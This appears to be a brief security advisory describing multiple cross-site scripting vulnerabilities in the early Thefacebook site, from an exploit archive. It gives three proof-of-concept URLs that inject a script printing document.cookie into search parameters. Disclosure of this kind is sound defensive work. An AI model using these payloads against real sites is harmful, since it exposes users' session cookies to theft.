|
Mark Zuckerberg Thefacebook Multiple Cross-Site Scripting Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept examples are available: http://www.example.com/search.php?do_search=1&advanced=1&name=&email=&status=&sex=&year=&house=&room=&mailbox=&phone=%3Cscript%3Edocument.write%28document.cookie %29%3C%2Fscript%3E&birthday=&address=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E&city=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E&st ate=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E&zip=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E&concentration=&political=&screenname =&cell=&relationship=&meeting_for=&meeting_sex=&text=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E http://www.example.com/global.php?do_search=1&high_school=1&state=1&city=2&hsid=1&changed=1&advanced=1&high_school=1&name=%3Cscript%3Edocument.write%28document.c ookie%29%3C%2Fscript%3E&hsyear= http://www.example.com/search.php?all_fields=0&do_search=1&advanced=1&group=%3Cscript%3Edocument.write%28document.cookie%29%3C%2Fscript%3E |
|
|
Privacy Statement |